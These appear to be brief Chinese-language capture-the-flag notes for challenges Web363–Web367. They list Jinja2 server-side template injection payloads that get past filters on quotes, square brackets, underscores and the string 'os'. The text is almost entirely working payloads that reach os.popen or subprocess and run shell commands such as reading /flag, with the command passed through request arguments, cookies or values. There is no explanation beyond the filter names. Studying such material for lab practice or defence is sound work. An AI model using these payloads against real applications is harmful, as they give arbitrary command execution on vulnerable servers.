SSTI
SSTI各种绕过
SSTI-Web363
过滤单双引号
{{[].__class__.__mro__[-1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag
SSTI-Web365
过滤中括号和单双引号
{{url_for.__globals__.os.popen(request.cookies.cmd).read()}}
SSTI-Web366
过滤下划线
{{(lipsum|attr(request.values.b)).os.popen(request.values.a).read()}}&a=cat%20/flag&b=__globals__
SSTI-Web367
过滤os
{{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag